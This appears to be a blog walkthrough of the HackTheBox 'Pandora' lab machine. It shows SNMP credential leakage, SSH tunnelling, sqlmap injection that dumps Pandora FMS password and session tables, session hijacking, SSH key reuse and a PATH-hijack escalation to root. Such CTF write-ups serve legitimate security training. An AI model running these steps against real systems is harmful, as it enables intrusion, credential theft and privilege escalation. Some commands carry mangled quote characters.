Hack_The_Box_Writeups

HackTheBox – Pandora Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sV -sC 10.10.11.136

http://10.10.11.136/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sU -top-ports=20 panda.htb

┌──(root㉿kali)-[/home/kali/Downloads]

└─# snmpwalk -v 1 -c public panda.htb > snmpwalk-1.txt

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat snmpwalk-1.txt

We get

Username: daniel

Password: HotelBabylon23

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh daniel@10.10.11.136

As you can see, while I was going through the information I found a cleartext username and password, so I used those to log into the machine via SSH.

The user flag is in another user’s directory, so I need to pivot into that user. The two primary targets I had were /var/www/html and /var/www/pandora. The html side was visible to the public, but the pandora was new. Inside the /etc/hosts file we see weird assignment, so I decide to use this as a lead.

If we assume that this hostname will trigger the pandora directory, then we will need to set up a dynamic tunnel. You can do this with the following command: ssh -D 9090 daniel@panda.htb Using this tunnel, we can set up a proxy to view the webpage.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh -D 9090 daniel@panda.htb

http://localhost.localdomain/pandora_console/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat /etc/proxychains4.conf

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -D pandora –tables

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -Ttpassword_history –dump

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -Ttsessions_php –dump

http://localhost.localdomain/pandora_console/index.php?session_id=g4e01qdgk36mfdh90hvcc54umq

https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py

We login now as admin.

http://localhost.localdomain/pandora_console/images/

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

matt@pandora:/home/matt$ cd .ssh

matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys

matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys

matt@pandora:/home/matt/.ssh$ cat id_rsa

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh matt@10.10.11.136 -i id_rsa

matt@pandora:~$ cd /home/matt/

matt@pandora:~$ echo “/bin/bash” > tar

matt@pandora:~$ chmod +x tar

matt@pandora:~$ export PATH=/home/matt:$PATH

matt@pandora:~$ /usr/bin/pandora_backup

root@pandora:~# cat /root/root.txt

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *